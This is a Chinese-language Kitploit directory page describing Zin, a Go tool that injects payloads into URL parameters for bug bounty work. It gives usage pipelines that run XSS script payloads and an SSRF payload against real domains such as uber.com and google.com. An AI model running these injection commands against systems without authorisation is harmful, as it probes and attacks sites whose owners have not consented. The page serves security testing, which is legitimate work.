Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Zin — 一款用Go编写的用于漏洞赏金的Payload注入器 | Kitploit
工具/GitHubGitHub/ethicalhackingplayground/zin
Web应用程序漏洞利用信息收集渗透测试
GitHubethicalhackingplayground/zin

Zin

一款用Go编写的用于漏洞赏金的Payload注入器

查看仓库
7026566年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

注射器图标

版本 1.0

😎 Zin 😎

一个使用Go编写的用于漏洞赏金的Payload注入器

Image from Gyazo

功能

  • 将多个payload注入到所有参数中
  • 将单个payload注入到所有参数中
  • 将响应保存到输出文件夹
  • 显示状态码和响应长度
  • 可以在响应中grep匹配模式
  • 非常快
  • 易于设置

安装

$ go get -u github.com/ethicalhackingplayground/Zin

新功能

-✅ 响应中的模式匹配

-✅ 匹配状态码

参数

      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


愿赏金降临


  -c int
        并发数(默认20)
  -g string
        在响应中grep任何匹配
  -p string
        要使用的payload
  -pL string
        要使用的payload列表
  -s int
        按状态码过滤(默认200)
        

SSRF示例

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS示例

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

注入多个Payload

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

子域名扫描

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

仅测试参数

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

多个主机

$ cat hosts | gau | Zin -c 80 -p <payload>

如果您获得了赏金,请通过请我喝咖啡来支持


请我喝杯咖啡
下载工具